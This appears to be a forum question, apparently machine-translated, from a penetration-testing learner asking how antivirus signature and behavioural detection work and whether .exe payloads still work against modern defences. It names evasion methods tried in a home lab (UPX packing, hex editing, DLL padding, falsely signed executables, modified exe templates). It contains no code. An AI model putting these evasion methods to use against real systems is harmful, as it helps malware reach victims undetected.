I recently started learning about ethical piracy and penetration testing. Along the way, I am sure that many people learn about these issues in which I have encountered some obstacles. I will not write an essay about my daily life and study schedule because I know that I will simply be super famous and I will not be able to get peace. Or, I'll take everyone to death. So I'm going to cut to the right …
My first question is this:
1) Antivirus software works by means of signature-based detection. Signature-based detection evaluates the elements (perhaps not the correct word?) Based on a large database of known threats. The software carries with it its own digital signature. If this signature for a particular item matches a known signature in the database, it is marked as malicious and the necessary steps are taken.
- Do AVs depend solely on this method?
- Let's say, for example, that the malware passes the AV (because its signature is new), is the malware at home and is it dry?
- Or do things such as behavioral analysis still prevail? Let's say the malware executes known commands or uses known components; Metasploit framework, Empire, etc. The malware has already exceeded the AV in terms of signature-based detection, provided that the malware is clean. Are there other possibilities that other defenses can detect malicious activity?
- How long does the AV "hang" from a particular executable? Let's say you start scanning it the moment it hits the disk. Okay, it's clean (according to AV), will it approve the executable, decrease its vigilance, increase, put on the white list or ignore?
2) Are binary executables dead in terms of initiating malicious payloads?
– I see many articles about known threats, particularly in the past, where the malicious load was not simply downloaded in executable format and then executed. A payload can, for example, be hidden in a PDF, a Word document and even then, the payload has not yet been executed and is simply downloaded by a Powershell command
– At what moment are binary executable payloads in .exe format useful in a possible attack, in any case? It's obvious to me that AV vendors today dissect and tear many .exe payloads, and rightly so. It is, by far, what I have learned, the most common vector of attack (if it is the correct way to explain it?) And also the oldest and well used. A person downloads a file that he thinks is legitimate, he is not, he sets up a reverse shell, ready. Or, a person downloads a file, believes it is legitimate, is a keylogger, is ready, or a RAT.
I still feel that there is more behind the scenes. The more I have gotten myself into the task of exploiting a Windows-based system (in my own lab environment), the harder and sometimes more messy it can be to simply put the thing on the computer in the first place. I have used hexadecimal editors, UPX, useless dlls aggregates and resources to confuse detection analysis, signed false executables, modified exe templates and yet … I feel something is missing …
I appreciate comments on this!